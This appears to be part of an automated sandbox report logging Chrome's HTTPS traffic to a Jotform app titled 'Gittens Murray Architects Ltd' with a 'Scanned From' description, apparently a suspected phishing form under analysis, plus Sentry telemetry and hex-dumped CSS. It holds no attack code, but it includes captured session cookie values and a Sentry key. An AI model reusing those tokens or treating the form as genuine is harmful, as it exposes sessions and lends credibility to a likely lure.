                                                                                                                                                                                                                                            Data Ascii: {({color:e})=>c.iv`background-color: ${e};`} svg { width: 19px; height: 19px; } }`,u=e=>{var{icon:t,IconRenderer:n}=e,l=(0,r._)(e,["icon","IconRenderer"]);return(0,i.jsx)(d,(0,a._)((0,o._)({},l),{children:(0,i.jsx)("div",{className
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 6d 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 7d 0a 0a 20 20 26 2e 70 61 6e 65 6c 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 63 61 70 69 74 61 6c 69 7a 65 3b 0a 20 20 20 20 62 6f 72 64
                                                                                                                                                                                                                                            Data Ascii: m; line-height: 1.5; font-weight: 500; font-family: inherit; } &.panel { display: inline-flex; align-items: center; justify-content: center; border-radius: 4px; cursor: pointer; text-transform: capitalize; bord
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 20 23 41 30 41 36 43 33 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 43 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 26 2e 74 61 73 74 65 2e 69 73 42 6c 75 65 2c 20 26 2e 70 61 6e 65 6c 2e 69 73 42 6c 75 65 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 39 39 46 46 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 2e 33 73 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 65 61 73 65 3b 0a 0a 20 20 20 20 26 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 61 64 66 66 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 26 3a 61 63 74 69 76 65 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: #A0A6C3; background-color: #FAFAFC; } } &.taste.isBlue, &.panel.isBlue { background-color: #0099FF; color: #fff; transition: .3s background-color ease; &:hover { background-color: #33adff; } &:active {
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 0a 20 20 20 20 20 20 73 76 67 20 70 61 74 68 20 7b 20 66 69 6c 6c 3a 20 23 66 66 66 3b 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 0a 20 20 26 2e 74 61 73 74 65 2e 71 75 69 63 6b 51 52 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 26 20 3e 20 73 76 67 20 7b 0a 20 20 20 20 20 20 26 20 3e 20 70 61 74 68 20 7b 20 66 69 6c 6c 3a 20 23 66 66 66 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 38 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 39 70 78 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 26 2e 74 61 73 74 65 2e 71 75 69 63 6b 51 52 20 7b 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: olor: #fff; svg path { fill: #fff; } } } &.taste.quickQR { border-radius: 4px; & > svg { & > path { fill: #fff } } @media screen and (max-width: 480px) { border-radius: 29px; } } &.taste.quickQR {


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            26192.168.2.1749731104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC775OUTGET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?time=1736507717 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1238INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:59 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:16 GMT
                                                                                                                                                                                                                                            jf-trace-id: b67910836ae4169d
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:35:59 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=ryw-nPNnemSleOEGRmSPqA&expires=1736510726
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1843
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5cbae778c17-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            27192.168.2.174973034.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC740OUTPOST /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC468OUTData Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 54 31 32 3a 33 35 3a 35 38 2e 31 36 35 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 72 65 61 63 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 38 2e 33 34 2e 30 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 62 36 31 30 30 63 32 63 36 32 61 34 34 65 61 33 39 30 39 33 62 31 36 62 32 34 62 62 32 36 36 37 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 54 31 32 3a 33 35 3a 35 38 2e 31 36 35 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 54 31 32 3a 33 35 3a 35 38 2e 31 36 35 5a 22 2c 22 73 74 61 74 75 73
                                                                                                                                                                                                                                            Data Ascii: {"sent_at":"2025-01-10T12:35:58.165Z","sdk":{"name":"sentry.javascript.react","version":"8.34.0"}}{"type":"session"}{"sid":"b6100c2c62a44ea39093b16b24bb2667","init":true,"started":"2025-01-10T12:35:58.165Z","timestamp":"2025-01-10T12:35:58.165Z","status
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:59 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2{}0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            28192.168.2.1749732104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC841OUTGET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?time=1736507717 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1238INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:00 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:16 GMT
                                                                                                                                                                                                                                            jf-trace-id: b67910836ae4169d
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:00 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=ryw-nPNnemSleOEGRmSPqA&expires=1736510726
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1844
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5cd494f8c05-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            29192.168.2.1749733104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC525OUTGET /app/250092704521347/manifest.json HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:00 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:00 GMT
                                                                                                                                                                                                                                            jf-trace-id: ffdf71029d2b77d6
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:00 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /app/:appID/manifest.json
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5cd5d9bf795-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC105INData Raw: 37 36 62 0d 0a 7b 22 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22
                                                                                                                                                                                                                                            Data Ascii: 76b{"name":"Gittens Murray Architects Ltd","short_name":"Gittens Murray Architects Ltd","description":"
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1369INData Raw: 53 63 61 6e 6e 65 64 20 46 72 6f 6d 20 3a 20 4d 50 44 36 30 39 5c 6e 22 2c 22 73 63 6f 70 65 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6a 6f 74 66 6f 72 6d 5f 70 77 61 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 73 74 61 6e 64 61 6c 6f 6e 65 22 2c 22 74 68 65 6d 65 5f 63 6f 6c 6f 72 22 3a 22 23 66 66 66 66 66 66 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 30 41 31 35 35 31 22 2c 22 69 63 6f 6e 73 22 3a 5b 7b 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d
                                                                                                                                                                                                                                            Data Ascii: Scanned From : MPD609\n","scope":"\/app\/250092704521347","start_url":"\/app\/250092704521347?utm_source=jotform_pwa","display":"standalone","theme_color":"#ffffff","background_color":"#0A1551","icons":[{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_M
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC432INData Raw: 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 5c 2f 66 6f 72 6d 5f 66 69 6c 65 73 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5f 6d 61 69 6e 50 57 41 49 63 6f 6e 2e 36 37 38 31 30 30 65 31 65 34 33 31 63 2e 70 6e 67 3f 77 69 64 74 68 3d 35 31 32 26 68 65 69 67 68 74 3d 35 31 32 26 74 69 6d 65 3d 31 37 33 36 35 30 37 37 31 37 22 2c 22 73 69 7a 65 73 22 3a 22 35 31 32 78 35 31 32 22 2c 22 74 79 70 65 22 3a 22 69 6d 61 67 65 5c 2f 70 6e 67 22 7d 5d 2c 22 73 68 6f 72 74 63 75 74 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 50 61 67 65 22 2c 22 75 72 6c 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5c 2f 70 61 67 65 5c 2f 30 3f 75 74 6d 5f 73 6f 75
                                                                                                                                                                                                                                            Data Ascii: \/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=512&height=512&time=1736507717","sizes":"512x512","type":"image\/png"}],"shortcuts":[{"name":"Page","url":"\/app\/250092704521347\/page\/0?utm_sou
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            30192.168.2.1749734104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC702OUTGET /app/250092704521347/manifest.json HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54
                                                                                                                                                                                                                                            If-Modified-Since: Fri, 10 Jan 2025 12:35:59 GMT
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:00 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:00 GMT
                                                                                                                                                                                                                                            jf-trace-id: a689f52fff67a20e
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347; expires=Mon, 10 Feb 2025 12:36:00 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:00 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /app/:appID/manifest.json
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC95INData Raw: 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 35 63 66 36 62 61 64 35 65 37 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: via: 1.1 googleCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8ffcb5cf6bad5e74-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:00 UTC1278INData Raw: 37 36 62 0d 0a 7b 22 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 63 61 6e 6e 65 64 20 46 72 6f 6d 20 3a 20 4d 50 44 36 30 39 5c 6e 22 2c 22 73 63 6f 70 65 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6a 6f 74 66 6f 72 6d 5f 70 77 61 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 73 74 61 6e 64 61 6c 6f 6e 65 22 2c 22 74 68 65 6d 65 5f 63 6f
                                                                                                                                                                                                                                            Data Ascii: 76b{"name":"Gittens Murray Architects Ltd","short_name":"Gittens Murray Architects Ltd","description":"Scanned From : MPD609\n","scope":"\/app\/250092704521347","start_url":"\/app\/250092704521347?utm_source=jotform_pwa","display":"standalone","theme_co
